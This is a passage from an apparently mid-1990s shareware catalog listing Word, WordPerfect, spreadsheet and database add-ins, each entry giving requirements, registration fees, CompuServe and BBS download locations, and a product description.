CIS:MSWORD forum LIBrary 4 (or contact userID 74250,1700 for + assistance). + SWREG#: 2260 + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + Quickly and effortlessly, one can create quality, professional- + looking, custom business cards with Word 6.0 + + + Product: CD Player for Word 6.0 + Author: + Version: 1 (05-02-95) + Needs: IBM AT (80286), Windows 3.1 or better. CD-ROM drive. + Word for Windows 6.0, CD-Audio Driver for Windows. + Registration fee: $15.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 5). 1-month free upgrading allowed. + Look for: CD.ZIP on BBSs; CD.ZIP on CompuServe in CIS:MSWORD + forum LIBrary 4 (or contact userID 74250,1700 for assistance). + SWREG#: 2857 + Download size: 75k (about six minutes with a 2400 baud modem) + Description: + The only full-featured CD player for Word. All basic CD + functions including scan backward/forward, stop, pause, random + play, live time display. Plus title database and more. All from + inside Word 6.0. Includes a beautiful, full-color toolbar and a + setup program. + + Chapter 3, "Writing applications" 217 + + + + Product: Chicago-Like Windows Titlers + Author: + Version: 1 (05-02-95) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows + 6.0. + Registration fee: $6.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 5). 1-month free upgrading allowed. + Look for: TITLE.ZIP on BBSs; TITLE.ZIP on CompuServe in + CIS:MSWORD forum LIBrary 4 (or contact userID 74250,1700 for + assistance). + SWREG#: 2402 + Download size: 45k (about four minutes with a 2400 baud modem) + Description: + This handy utility set will change Word's titlebar caption to + the title of the document, not the FileName. This simulates how + Windows 4.0 (Chicago) will work. Easy to use. Toolbars and help + included. Break the 8-character DOS limitation. Have long + descriptive names - not cyptic DOS file names. + + + Product: Colored Toolbar Icons for Word + Author: + Version: 2.0 (05-02-95) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows + 6.0. + Registration fee: $10.00 + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 6 months of + unlimited CompuServe, mail support; bonus graphics; all ASP- + wide offers (see page 5). + Look for: AFCOLICO.ZIP on BBSs; AFCOLI.ZIP on CompuServe in + CIS:MSWORD forum LIBrary 4 (or contact userID 74250,1700 for + assistance). + SWREG#: 2303 + Download size: 35k (about three minutes with a 2400 baud modem) + Description: + This is a sample of the entire collection of colored toolbar + icons that come with the registered version. Colored toolbar + icons for every possible task you can imagine. Jazz up the Word + Workplace. Liven up presentations in Word. + + Chapter 3, "Writing applications" 218 + + + + Product: Exit Master for Word 6.0 + Author: + Version: 1.0 (05-02-95) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows + 6.0. + Registration fee: $6.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 5). 1-month free upgrading allowed. + Look for: EXIT.ZIP on BBSs; EXIT.ZIP on CompuServe in CIS:MSWORD + forum LIBrary 4 (or contact userID 74250,1700 for assistance). + SWREG#: 2502 + Download size: 45k (about four minutes with a 2400 baud modem) + Description: + Now, from inside Word, you can exit to DOS, exit Windows, + restart Windows, reboot your computer, and Exit Word with just + one click! Easy to use and operate. For Word 6.0 only. + + + Product: File Manager Jr. + File manager for WinWord 6.0. See full description on + page 157. + + Product: French Dictionary for Word 6.0 + Author: + Version: 1.0 (05-02-95) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows + 6.0. + Registration fee: $15.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 5). 1-month free upgrading allowed. + Look for: FRENCH.ZIP on BBSs; FRENCH.ZIP on CompuServe in + CIS:MSWORD forum LIBrary 4 (or contact userID 74250,1700 for + assistance). + SWREG#: 2700 + Download size: 55k (about four minutes with a 2400 baud modem) + Description: + Now you can easily look up words in English OR French, and have + the translations pasted into your document with accents. Easy + to use. Requires no effort. Word 6.0 only. + + Chapter 3, "Writing applications" 219 + + + + Product: HELLLP! + Author: + Version: 1.0c (11-20-93) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $30.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of CompuServe, mail support; all ASP- + wide offers (see page 5). 12-month free upgrading allowed. + Look for: HELLLP.ZIP on BBSs (call 604-736-3453 to download it at + no charge); HELLLP.EXE on CompuServe in CIS:MSWORD forum + LIBrary 4 (or contact userID 71750,1036 for assistance). + SWREG#: 1346 + Download size: 75k (about six minutes with a 2400 baud modem) + Description: + Designed for user friendliness. Automatically sets up top level + table of contents with Hypertext jumps to topics already in + place. Add additional jumps and popups by highlighting the + place you want to jump from and pointing to the place you want + to jump to. Use Windows Help to give Hypertext access to + corporate manuals, as well as programs, templates and macros - + your people already know it and it's free with Windows. + + + Product: MegaWord + Author: , (+1)-314-965-5630 + Version: 6.01 (04-26-94) + Needs: IBM PC, Windows 3.0 or better. + Strongly recommended: Mouse. + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 3-month return policy; source code; + all ASP-wide offers (see page 5); discounts on other products; + discounts on upgrades. 3-month free upgrading allowed. + Look for: MEGAWORD.ZIP on BBSs; MW601.ZIP on CompuServe in + CIS:MSWORD forum LIBrary 4 (or contact userID 100273,32 for + assistance). + SWREG#: 1130 + PsL#: 10970 + Download size: 440k (about 33 minutes with a 2400 baud modem) + Description: + An add-in template for Word for Windows v6.0. Offers more than + 30 applications for complete file, project and directory + management, printing, editing, formatting, viewing, instant + spell-checking, plus tools that insert calendars, numbers and + dates in any format and in more than 20 languages. + + Chapter 3, "Writing applications" 220 + + + + Product: P.I.M. for Word 6.0 for Windows + Author: + Version: 4.3 DB+ (08-08-95) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows + 6.0. + Registration fee: $15.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 5); discounts on upgrades. 1-month free upgrading allowed. + Look for: PIM.ZIP on BBSs; PIM.ZIP on CompuServe in CIS:MSWORD + forum LIBrary 4 (or contact userID 74250,1700 for assistance). + SWREG#: 2480 + Download size: 95k (about seven minutes with a 2400 baud modem) + Description: + The only full featured PIM for Word for Windows 6.0. Store up + to 21,000 entries. Works and looks like a real rolodex. + Autodial, fax, create envelopes and labels, create full-color + reports, create lusiness letters and more with just one click. + Easy to use push-button interface. Supports background + WinFaxing, voice mail telephones, & all modems. Full + documentation included along with an installation utility. + Imports every database and spreadsheet. Has an alarm and more. + Now with Fax Merge! + + + Product: Pink Bunny + Author: + Version: 1.0 (11-20-93) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $10.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); all + ASP-wide offers (see page 5). + Look for: PNKBNY.ZIP on BBSs (call 604-736-3453 to download it at + no charge); PNKBNY.EXE on CompuServe in CIS:MSWORD forum + LIBrary 4 (or contact userID 71750,1036 for assistance). + Download size: 8k (about one minute with a 2400 baud modem) + Description: + Takes as input the name of a macro and a filename pattern which + may include wildcards (*,?). Opens each file, runs the macro, + saves and closes the file. The save may be switched off. + Another switch can be set to stop the open if a non-Word file + matches the pattern. Of particular value in conversion + projects where there are often minor fixups which need to be + made by macro to a bunch of files. + + Chapter 3, "Writing applications" 221 + + + + Product: Toolbar 2X for Word 6.0 + Author: + Version: 2.0 (05-02-95) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows + 6.0. + Registration fee: $15.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 5). 1-month free upgrading allowed. + Look for: TB2X.ZIP on BBSs; TB2X.ZIP on CompuServe in CIS:MSWORD + forum LIBrary 4 (or contact userID 74250,1700 for assistance). + SWREG#: 2677 + Download size: 55k (about four minutes with a 2400 baud modem) + Description: + Eliminate the clutter form the Word 6.0 Desktop with Toolbar + 2x. Allows two toolbars to occupy the space of one. Now fully + customizable. Easy to use and setup. Leaves more room for text + rather than toolbars. A real productivity tool. + + + Product: Ultimate Faxer for Word 6.0 + Author: + Version: 1.0 (05-02-95) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows + 6.0. + Registration fee: $5.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 5). 1-month free upgrading allowed. + Look for: FAXAMF.ZIP on BBSs; FAXAMF.ZIP on CompuServe in + CIS:MSWORD forum LIBrary 4 (or contact userID 74250,1700 for + assistance). + SWREG#: 2204 + Download size: 45k (about four minutes with a 2400 baud modem) + Description: + Using any version of WinFax (even the Lite and Ultralite + versions), you can easily fax the current document from Word + for Windows 6.0. Easy to use and has a handy page range + feature. + + + Product: WordLink(TM) + Author: , 310-832-6984 + Version: 1.0 (09-25-95) + Needs: IBM PC, Windows 3.0 or better. 8000k RAM; VGA monitor; + Hard disk; VBRUN300.DLL. + Strongly recommended: SVGA monitor; XMS memory; math + coprocessor. + Registration fee: $49.50 (add $5.50 for shipping to U.S. + addresses) (add $5.50 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 5); discounts on other products. + + Chapter 3, "Writing applications" 222 + + + + Lifetime free upgrading allowed. Help in writing queries for + applications. + Look for: availability unknown on BBSs; W_LINK.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 2 (or contact userID 71744,3633 + for assistance). + SWREG#: 7722 + PsL#: 14239 + Download size: 2600k (about 193 minutes with a 2400 baud modem) + Description: + You can drag 'n' drop data from Access, dBase, FoxPro, Btrieve, + Paradox databases to a MSWord document with WordLink. You can + drop values of single fields of a record at bookmarks, or + multiple fields of multiple records into tables. WordLink is + also a database browser with full edit, query, sorting + capabilities. Calculated columns. Column totals. Parameter + queries. It records datasources and relationships in macros. + Macro play back allows full automation. Sample application + prints invoices. + + + Product: Wordware v4.0a for WinWord 6 + Author: + Version: 4.0a (08-08-95) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows + 6.0. + Registration fee: $39.95 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 5); discounts on upgrades. + Look for: WW4.ZIP on BBSs; WW4.ZIP on CompuServe in CIS:MSWORD + forum LIBrary 4 (or contact userID 74250,1700 for assistance). + SWREG#: 3297 + PsL#: 11521 + Download size: 355k (about 27 minutes with a 2400 baud modem) + Description: + Wordware has the hottest 60+ tools which will increase your + productivity 100% or more. Includes a full-fledged PIM, full- + faetured CD-player, and everything from copying files, to + renaming files, to playing tic tac toe. Even has a project + manager. Also Includes a 3.5" disk labeler, a faxer macro and + template which access every feature of WinFax Pro 4.0. Easy to + use and operate. Wordware is a complete people, file, & project + management solution package, & much more! + + + 3.15.4 For WordStar + + Product: DDKEY + Powerful 7.5K TSR key redefinition utility. See full + description on page 63. + + Product: Over_LAZ HP + HP LaserJet overlays and letterheads. See full description on + page 214. + + Chapter 3, "Writing applications" 223 + + + + 3.15.5 For WordPerfect + + Product: Bookbild/DOS Pamphlet Publisher + Author: , 410-661-2224 + Version: 1.1 (02-01-95) + Needs: IBM PC, DOS 3.0 or better. 640k RAM. WordPerfect 5.1 or + 5.1+/DOS. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 12 months of unlimited + phone, fax, BBS, CompuServe, GEnie, newsletter, mail support; + 3-month return policy; bonus utilities; bonus graphics; all + ASP-wide offers (see page 5); discounts on other products. + Look for: BKBILD11.ZIP on BBSs (call 410-285-4032 to download it + at no charge); BKBILD.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 12 (or contact userID 72144,1241 for assistance); + BKBILD11.ZIP on GEnie in WP forum LIBrary 6 (or contact userID + JERRY.STERN for assistance). + Download size: 137k (about ten minutes with a 2400 baud modem) + Description: + A macro package for WordPerfect 5.1 & 5.1+. The macro builds + pamphlets from formatted text files. The new document is + camera-ready, with each page in the correct sequence for + printing. Any two-across format can be used, in either + portrait or landscape mode. (Requires landscape fonts in + printer or add-on font package for landscape booklets.) Both + horizontally and vertically-folded booklets can be created. + + + Product: Bookbild/Win Pamphlet Publisher + Author: , 410-661-2224 + Version: 1.1 (02-01-95) + Needs: IBM 80386, Windows 3.0 or better. 4000k RAM. WordPerfect + 5.2 or 5.2+/Windows. + Registration fee: $20.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 12 months of unlimited + phone, fax, BBS, CompuServe, GEnie, newsletter, mail support; + 3-month limited return policy; bonus graphics; all ASP-wide + offers (see page 5); discounts on other products. + Look for: BOOKWN11.ZIP on BBSs (call 410-285-4032 to download it + at no charge); BOOKWN.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 10 (or contact userID 72144,1241 for assistance); + BOOKWN11.ZIP on GEnie in WP forum LIBrary 8 (or contact userID + JERRY.STERN for assistance). + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + Builds pamphlets for formatted documents in WordPerfect 5.2. + Any two-across format can be used, in either portrait or + landscape mode. Pages are rearranged into the order needed to + + Chapter 3, "Writing applications" 224 + + + + create camera-ready copy for bulk printing. Full instructions + make booklet preparation easy. + + + Product: dPerfect Merge + Converts xBase to WordPerfect secondary file. See full + description on page 51. + + Product: Graphcat/DOS Clip Art Cataloger + Author: , 410-661-2224 + Version: 3.1 (06-20-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; Hard disk. + WordPerfect 6.0 or 5.1 DOS editions, 6/90 release or newer. + Registration fee: $20.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 12 months of phone, + fax, BBS, CompuServe, GEnie, newsletter, mail support; 3-month + return policy; bonus graphics; all ASP-wide offers (see + page 5); discounts on other products; discounts on upgrades. + Look for: GCATWP31.ZIP on BBSs (call 410-285-4032 to download it + at no charge); GCATWP.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 10 (or contact userID 72144,1241 for assistance); + GCATWP31.ZIP on GEnie in WP forum LIBrary 6 (or contact userID + J.STERN10 for assistance). + Download size: 114k (about nine minutes with a 2400 baud modem) + Description: + DOS macro package that creates clip art catalogs in WordPerfect + 6.0, 5.1+, and 5.1. Prepares a catalog for printing with all + the graphics it can find in the directory or on the disk + chosen. Any graphic format supported by WordPerfect is also + supported. Support for WordPerfect 6.0. New in version 3.1: + Adds CD-ROM support, directory searching, partial catalogs, and + caption autosizing. Default settings can now be customized in + the registered edition, which also includes a megabyte of clip + art samples. + + + Product: Graphcat/Win Clip Art Cataloger + Author: , 410-661-2224 + Version: 3.2 (02-01-95) + Needs: IBM 80386, Windows 3.0 or better. 4000k RAM. + WordPerfect/Windows version 6.1, 6.0 & 5.2, 5.2+. + Registration fee: $20.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 12 months of unlimited + phone, fax, BBS, CompuServe, GEnie, newsletter, mail support; + 3-month limited return policy; bonus graphics; all ASP-wide + offers (see page 5); disks of other shareware; discounts on + other products; discounts on upgrades. + Look for: GCATWN32.ZIP on BBSs (call 410-285-4032 to download it + at no charge); GCATWN.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 10 (or contact userID 72144,1241 for assistance); + + Chapter 3, "Writing applications" 225 + + + + GCATWN32.ZIP on GEnie in WP forum LIBrary 8 (or contact userID + JERRY.STERN for assistance). + Download size: 130k (about ten minutes with a 2400 baud modem) + Description: + A macro package for WordPerfect 6.1, 6.0, 6.0a, 5.2 & 5.2+ / + Windows that creates pictorial catalogs of clip art. All + graphics formats readable by WP/Win can be read by Graphcat, + and set up in columns as a pictorial catalog. Also can create + mergable listings of file names, and includes a database + template to aid in creating a full database of clip art files. + Supports directory searches, CD-ROM support, partial catalog + building, caption autosizing. + + + Product: The Letterhead Kit/DOS + Author: , 410-661-2224 + Version: 3.0 (06-28-93) + Needs: IBM PC, DOS 3.0 or better. 640k RAM. WordPerfect 6.0 or + 5.1 DOS editions. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: quick-reference card; 31/2" master disk(s); + 12 months of unlimited phone, fax, BBS, CompuServe, GEnie, + newsletter, mail support; 3-month limited return policy; bonus + utilities; bonus templates; all ASP-wide offers (see page 5); + discounts on other products. + Look for: LTRKIT30.ZIP on BBSs (call 410-285-4032 to download it + at no charge); LTRKIT.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 2 (or contact userID 72144,1241 for assistance); + LTRKIT30.ZIP on GEnie in WP forum LIBrary 6 (or contact userID + JERRY.STERN for assistance). + Download size: 161k (about twelve minutes with a 2400 baud modem) + Description: + A set of macros, forms, and graphics for WordPerfect 6.0 and + 5.1/DOS for retrieving letterheads, invoices, scanned + signatures, and up to 10 FAX cover sheets or other custom forms + (20 in registered edition). Support for WordPerfect 6.0/DOS, + more FAX forms available, easier installation and + customization, with personal form names on the FAX menu. + Supports two letterheads and two scanned signatures-business + and personal. + + Chapter 3, "Writing applications" 226 + + + + Product: The Letterhead Kit/Win + Author: , 410-661-2224 + Version: 3.0 (02-25-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk. WordPerfect 6.1 or 6.0, 6.0a/Windows. + Registration fee: $20.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; quick- + reference card; 31/2" master disk(s); 12 months of phone, fax, + BBS, CompuServe, GEnie, newsletter, mail support; 3-month + return policy; bonus utilities; bonus data; bonus templates; + all ASP-wide offers (see page 5); disks of other shareware; + discounts on other products; discounts on upgrades. + Look for: LTRWIN30.ZIP on BBSs (call 410-285-4032 to download it + at no charge); LTRWIN.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 2 (or contact userID 72144,1241 for assistance); + LTRWIN30.ZIP on GEnie in WP forum LIBrary 8 (or contact userID + JERRY.STERN for assistance). + Download size: 240k (about 18 minutes with a 2400 baud modem) + Description: + Business Correspondence Assistant for WordPerfect 6.1 & 6.0, + 6.0a/Windows. A set of macros, forms, graphics and sample files + that retrieve letterheads, fax cover sheets, invoices, scanned + signature, and 30 message graphics, including "Rush!" and + "Thank you for your payment!" Forms and letterheads are + customized on-the-fly with user's name and address information. + + + Product: Over_LAZ HP + HP LaserJet overlays and letterheads. See full description on + page 214. + + Product: PC-Proof + A commercial quality grammar checker. See full description on + page 204. + + Product: Public Address + Full featured address manager. See full description on + page 243. + + Product: Thelma ThistleBlossom + Checks grammar, style, spell, punc & more. See full + description on page 204. + + Product: Thelma's ClichePlus + Finds cliches, idioms, long sentences. See full description on + page 205. + + Product: Thelma's SpellPlus + Spell, capitalizes, proper nouns, full editor. See full + description on page 202. + + Chapter 3, "Writing applications" 227 + + + + Product: WinProof + Windows grammar checker. See full description on page 206. + + 3.15.6 For other + + Product: Btr Help! + Btrieve File Utility. Repair, Edit, Browse. See full + description on page 438. + + Product: Examine + Fast text search utility for Windows. See full description on + page 14. + + Product: Over_LAZ PS + PostScript overlays and letterheads. See full description on + page 93. + + Product: PSEARCH + Fast tool to search for files with text words. See full + description on page 17. + + Chapter 4, "Spreadsheet applications" 228 + + + + + + Chapter 4 + Spreadsheet applications + + See also: Utilities, Desktop utilities, Calculators; Finances, + Financial calculators; Business. + + + 4.1 Spreadsheet programs + + Product: ALITE + Author: , 508-794-9377 + Version: 1.20r (07-08-93) + Needs: IBM PC, DOS 2.11 or better. 7k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; Dual 720k floppy drives; + Epson printer. + Strongly recommended: EGA monitor; Hard disk; EMS memory; XMS + memory. + Registration fee: $20.00 (add $6.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $12.50 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + fax, BBS, CompuServe, newsletter, mail support; 1-month limited + return policy; discounts on other products. + Look for: ALITE.ZIP on BBSs (call 617-354-2505 to download it at + no charge); ALITE.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 6 (or contact userID 71333,103 for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Powerful spreadsheet that will run even on a system with only + 256k RAM! It will even run as TSR using 7k RAM; 2048 rows by + 128 columns; line, X-Y, bar, pie and stacked bar graphs; macro + command language, math, statistical, financial, date and string + functions; WKS and WK1 file compatible; data regression, data + question and data bin operations; file import, export and + merge, PIC file generation, and file linking; split windows, + block protection, matrix operations, and much more... + + Chapter 4, "Spreadsheet applications" 229 + + + + Product: AS-EASY-AS + Author: , 508-794-9377 + Version: 5.50e (10-29-93) + Needs: IBM PC, DOS 3.2 or better. 382k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; Dual 720k floppy drives; + HP LaserJet printer; Epson printer. + Strongly recommended: EGA monitor; Hard disk; Mouse; EMS + memory; math coprocessor. + Registration fee: $69.00 (add $6.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $12.50 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + fax, BBS, CompuServe, newsletter, mail support; 1-month limited + return policy; discounts on upgrades. + Look for: ASA550E.ZIP on BBSs (call 617-354-2505 to download it + at no charge); ASEASY.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 6 (or contact userID 71333,103 for assistance). + Download size: 330k (about 25 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Awards & nominations: 1992 winner, Shareware Industry Awards. + Description: + Powerful 8192 rows by 256 columns spreadsheet. EMS and virtual + memory support. Fully mouseable. Print preview mode with + headers, footers, etc. Math, statistical, financial, logical, + date/time, string and user defined functions. Text & graphics + on same page. 12 graph types, (log scales, split graphs). + 9-pin, 24-pin and LaserJet support. WKS and WK1 file + compatible. Powerful macro language. Goalseeking, dBASE file + export/import, file merge & file linking. Matrix operations, + and much more... + + Chapter 4, "Spreadsheet applications" 230 + + + + Product: EXPRESSCALC + Author: , 206-788-0932 + Version: 4.10 (05-02-92) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $59.95 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $23.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; 2-month return policy; discounts on + upgrades. 1-month free upgrading allowed. + Look for: ECALC*.ZIP on BBSs (multiple files) (call 206-788-4008 + to download it at no charge); ECALC4.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 6 (multiple files) (or contact userID + 75226,2020 for assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Matrix size defaults to 64 columns by 256 lines for a total of + 16,384 cells. Supports EGA and VGA monitors for more lines on + the screen. Math functions include standard deviation, net + present value, payment and more. Lookup function allows + linking to other spreadsheets. Cells can be hidden. Data can + be imported and exported between File Express and ExpressGraph. + Wide spreadsheets can be printed using On-Side. + + + Product: Total Investor for 1-2-3 Window + Portfolio management and charting for 1-2-3. See full + description on page 230. + + + 4.2 Boilerplates/templates + + Product: INSTSPEC + Templates for instr data sheets (controls). See full + description on page 365. + + Chapter 4, "Spreadsheet applications" 231 + + + + Product: Total Investor for 1-2-3 Window + Author: , 201-895-5665 + Version: 3.0 (08-17-95) + Needs: IBM 80386, DOS 3.0 or better. 4000k RAM. + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 12 months of unlimited fax, BBS, + CompuServe, newsletter, mail support; bonus data; all ASP-wide + offers (see page 5). Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; TI123.EXE on CompuServe + in CIS:LOTUSA forum LIBrary 0 (or contact userID 76057,2400 for + assistance). + SWREG#: 7060 + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + An integrated portfolio management and technical analysis + package for use with Lotus 1-2-3 for Windows (v4 or better). It + tracks securities and transactions, calculates returns, charts + stocks, and helps make trading decisions based on a wide array + of technical indicators. Includes built in updating from + America Online, Prodigy, and Compuserve. Indicators include + HLCV charts, relative strength, moving averages, RSI and many + others. + + + 4.3 Spreadsheet utilities + + See also: Utilities, Printer utilities. + + Product: ON-SIDE + Print any wide ASCII file sideways. See full description on + page 77. + + 4.3.1 File format translators + + See also: Utilities, File utilities, File sorting & conversion. + + Product: DATA MASTER + Database management program. See full description on page 237. + + Product: Extract It + Report data extractor. See full description on page 52. + + + 4.4 Software tools & add-ins + + 4.4.1 For multiple programs + + Product: 4Print/4Book DOS + Paper saving utility for LaserJets & DeskJets. See full + description on page 89. + + Chapter 4, "Spreadsheet applications" 232 + + + + Product: 4Print/4Book Windows + 4Print/4Book DOS + 4PrinW Windows interface. See full + description on page 89. + + Product: Bubble Chart + Bubble chart, animated graph. See full description on + page 291. + + Product: Simstat + Complete statistics and simulation program. See full + description on page 395. + + 4.4.2 For Lotus + + Product: Total Investor for 1-2-3 DOS + Portfolio manager/technical analysis template. See full + description on page 339. + + Product: Total Investor for Symphony + Portfolio manager/technical analysis template. See full + description on page 340. + + 4.4.3 For Excel + + Product: DDE Requester for Win3.x & NT + DDE history recorder to access1.1 MDB or text. See full + description on page 355. + + Product: Units & Volumes [***] + Author: + Version: 1.1 (08-01-95) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM. MS Excel + 5.0. + Registration fee: $25.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); 6 months of unlimited CompuServe, + mail support; bonus utilities; all ASP-wide offers (see + page 5); discounts on upgrades. 3-month free upgrading allowed. + Look for: availability unknown on BBSs; UNITVOL.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 13 (or contact userID 74130,1531 for + assistance). + SWREG#: 8185 + Download size: 203k (about 15 minutes with a 2400 baud modem) + Description: + An add-in for Microsoft Excel. It contains extensive unit + conversion and tank volume calculation functions. 17 unit + functions cover everything from Acceleration to Volumetric + Flow. 6 tank geometry functions range from spherical to + horizontal cylinder with end caps. Full Function wizard support + and extensive on-line help. + + Chapter 5, "Database applications" 233 + + + + + + Chapter 5 + Database applications + + See also: Data; Computer programming, Database engines. + + + 5.1 Relational database managers + + Product: THE CALLING TREE + Calling tree database manager. See full description on + page 315. + + Product: Car Restoration Diary + Author: , 317-782-9903 + Version: 2.31 (01-27-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Hard disk. + Registration fee: $29.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of phone, BBS, CompuServe, mail support; 1-month return + policy; all ASP-wide offers (see page 5); disks of other + shareware. + Look for: CREST231.ZIP on BBSs (call 317-784-2147 to download it + at no charge); CREST.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 6 (or contact userID 73567,1547 for assistance). + SWREG#: 1581 + Download size: 328k (about 25 minutes with a 2400 baud modem) + Description: + Database program to keep track of expenses and time spent while + restoring vintage cars. It will also maintain a database of + parts dealers, car shows, swap meets, etc. Includes an + appointment calendar and a pop-up calculator. View and print + reports and mailing labels. Easy to learn and use. Context + sensitive online help. + + Chapter 5, "Database applications" 234 + + + + Product: Computer System Manager + Author: , 317-782-9903 + Version: 1.41 (02-19-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Hard disk. + Strongly recommended: Hercules monitor; Epson printer. + Registration fee: $29.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, BBS, CompuServe, + mail support; 3-month return policy; all ASP-wide offers (see + page 5); discounts on other products; discounts on upgrades. + Look for: CSM141.ZIP on BBSs (call 317-784-2147 to download it at + no charge); CSM.ZIP on CompuServe in CIS:PCAPP forum LIBrary 7 + (or contact userID 73567,1547 for assistance). + SWREG#: 1371 + Download size: 430k (about 32 minutes with a 2400 baud modem) + Description: + Comprehensive computer system equipment tracking. Ideal for + home users, small business, and corporate system managers. + Information can be tracked to individual computer systems + noting model & serial numbers, install dates, warranty + expiration, etc. Set up an inventory for unassigned equipment + and spare parts. Free form report writer. Full customization of + screen colors, file indexes, printer, and validation tables + including Vendor, Hardware and Software types. Context + sensitive online help. + + + Product: DATABASE BROWSER + Author: , 310-832-6984 + Version: 1.21 (04-15-95) + Needs: IBM 80386, Windows 3.1 or better. 8000k RAM; VGA monitor; + Hard disk; VBRUN300.DLL. + Strongly recommended: SVGA monitor; Mouse; Network (LAN); XMS + memory; math coprocessor. + Registration fee: $49.50 (add $5.50 for shipping to U.S. + addresses) (add $5.50 for shipping to 